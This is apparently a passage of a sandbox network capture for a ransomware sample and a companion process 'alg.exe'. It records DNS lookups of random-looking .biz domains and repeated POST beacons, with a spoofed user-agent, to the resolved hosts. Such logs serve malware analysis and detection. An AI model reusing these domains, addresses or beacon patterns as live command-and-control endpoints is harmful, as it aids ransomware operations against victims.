Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=03be403ee281a729d35802bb20c96747|194.110.13.70|1723257704|1723257704|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://whjovd.biz/rkmfaitlvd

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /rkmfaitlvd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0760dc4f96a9d9ae27dd7a954e5d6fcb|194.110.13.70|1723257705|1723257705|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

banwyw.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

44.221.84.105
DNS

banwyw.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

44.221.84.105
POST

http://banwyw.biz/cxrlkhprtqe

alg.exe

Remote address:

44.221.84.105:80

Request

POST /cxrlkhprtqe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ab30c4edf5201e1994938bb28f48df15|194.110.13.70|1723257704|1723257704|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

muapr.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

wxgzshna.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wxgzshna.biz

IN A

Response

wxgzshna.biz

IN A

72.52.178.23
POST

http://wxgzshna.biz/nosfroxqexgsdh

alg.exe

Remote address:

72.52.178.23:80

Request

POST /nosfroxqexgsdh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

gjogvvpsf.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A

Response

gjogvvpsf.biz

IN A

208.100.26.245
DNS

reczwga.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

44.221.84.105
DNS

reczwga.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

44.221.84.105
POST

http://reczwga.biz/rockb

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /rockb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70933f76fa8407c78a4e4ccae471d1ab|194.110.13.70|1723257706|1723257706|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://wxgzshna.biz/dsavdykbjv

alg.exe

Remote address:

72.52.178.23:80

Request

POST /dsavdykbjv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

zrlssa.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zrlssa.biz

IN A

Response

zrlssa.biz

IN A

44.221.84.105
POST

http://zrlssa.biz/vcbqknlytkbbu

alg.exe

Remote address:

44.221.84.105:80

Request

POST /vcbqknlytkbbu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8dcb0789b91683778cde36789dd3942a|194.110.13.70|1723257706|1723257706|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jlqltsjvh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jlqltsjvh.biz

IN A

Response

jlqltsjvh.biz

IN A

18.141.10.107
DNS

23.178.52.72.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.178.52.72.in-addr.arpa

IN PTR

Response

23.178.52.72.in-addr.arpa

IN PTR

lb01 parklogiccom
POST

http://jlqltsjvh.biz/nviyjifo

alg.exe

Remote address:

18.141.10.107:80

Request

POST /nviyjifo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6704530d2cd14c614b0413381efccfa2|194.110.13.70|1723257707|1723257707|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bghjpy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
POST

http://bghjpy.biz/cqdmnramj

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /cqdmnramj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c0a92403375a1ea387ed9f5bb3c7fa9f|194.110.13.70|1723257707|1723257707|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

damcprvgv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A

Response

damcprvgv.biz

IN A

18.208.156.248
DNS

damcprvgv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A
POST

http://damcprvgv.biz/yupadylunhwfy

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /yupadylunhwfy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8db7beaaddcb61e412839068521672b9|194.110.13.70|1723257707|1723257707|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ocsvqjg.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
POST

http://ocsvqjg.biz/mndmtaw

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

3.254.94.185:80

Request

POST /mndmtaw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=71a8b889e51d82c878fd27eea5420d5e|194.110.13.70|1723257708|1723257708|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xyrgy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xyrgy.biz

IN A

Response

xyrgy.biz

IN A

18.208.156.248
POST

http://xyrgy.biz/de

alg.exe

Remote address:

18.208.156.248:80

Request

POST /de HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xyrgy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=74cc54ec0d4f902537880fa52fb6ca45|194.110.13.70|1723257708|1723257708|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ywffr.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ywffr.biz

IN A

Response

ywffr.biz

IN A

54.244.188.177
DNS

htwqzczce.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A

Response

htwqzczce.biz

IN A

172.234.222.138

htwqzczce.biz

IN A

172.234.222.143
DNS

htwqzczce.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

htwqzczce.biz

IN A
POST

http://ywffr.biz/ey

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /ey HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3aa30d57c8ef5f564ea683715f5e1f8c|194.110.13.70|1723257709|1723257709|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://htwqzczce.biz/fdjsyjdmh

alg.exe

Remote address:

172.234.222.138:80

Request

POST /fdjsyjdmh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
POST

http://htwqzczce.biz/bgyfxpgneqbmdrd

alg.exe

Remote address:

172.234.222.138:80

Request

POST /bgyfxpgneqbmdrd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: htwqzczce.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
POST

http://kvbjaur.biz/kidgnxhtlufkka

alg.exe

Remote address:

54.244.188.177:80

Request

POST /kidgnxhtlufkka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kvbjaur.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bf5c2ab323f0fde10248d2ce20b67320|194.110.13.70|1723257709|1723257709|0|1|0; path=/; domain=.kvbjaur.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ecxbwt.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
DNS

ecxbwt.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ecxbwt.biz

IN A

Response

ecxbwt.biz

IN A

54.244.188.177
POST

http://ecxbwt.biz/ggijh

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /ggijh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ecxbwt.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=85744c7e2e2fda549967f5e94e077506|194.110.13.70|1723257709|1723257709|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uphca.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uphca.biz

IN A

Response

uphca.biz

IN A

44.221.84.105
POST

http://uphca.biz/teqedfknpkosgo

alg.exe

Remote address:

44.221.84.105:80

Request

POST /teqedfknpkosgo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uphca.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4dd76195be5f3379f9cc092fed8c866a|194.110.13.70|1723257710|1723257710|0|1|0; path=/; domain=.uphca.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pectx.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
DNS

pectx.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pectx.biz

IN A

Response

pectx.biz

IN A

44.213.104.86
POST

http://pectx.biz/icehp

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /icehp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=456976cf68bad20667f620394dc71c0f|194.110.13.70|1723257711|1723257711|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fjumtfnz.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fjumtfnz.biz

IN A

Response

fjumtfnz.biz

IN A

34.211.97.45
POST

http://fjumtfnz.biz/cifnhpxqu

alg.exe

Remote address:

34.211.97.45:80

Request

POST /cifnhpxqu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fjumtfnz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=665760260bb147df608a5d7f9711249e|194.110.13.70|1723257711|1723257711|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zyiexezl.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

18.208.156.248
DNS

zyiexezl.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zyiexezl.biz

IN A

Response

zyiexezl.biz

IN A

18.208.156.248
POST

http://zyiexezl.biz/hwhkk

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /hwhkk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e603bbf1b672b2d2325172dd4897fb6e|194.110.13.70|1723257711|1723257711|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hlzfuyy.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
POST

http://hlzfuyy.biz/letlovtcg

alg.exe

Remote address:

34.211.97.45:80

Request

POST /letlovtcg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=096608078680ccdd78384e9129a94f92|194.110.13.70|1723257711|1723257711|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

banwyw.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

banwyw.biz

IN A

Response

banwyw.biz

IN A

44.221.84.105
POST

http://banwyw.biz/nonvbgwvrqdbuy

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /nonvbgwvrqdbuy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=69d27a6d1a2e129619c72f3a078d485b|194.110.13.70|1723257711|1723257711|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

muapr.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

muapr.biz

IN A

Response
DNS

wxgzshna.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wxgzshna.biz

IN A

Response

wxgzshna.biz

IN A

72.52.178.23
DNS

rffxu.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
POST

http://wxgzshna.biz/ryp

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

72.52.178.23:80

Request

POST /ryp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://rffxu.biz/ryp

alg.exe

Remote address:

34.246.200.160:80

Request

POST /ryp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rffxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
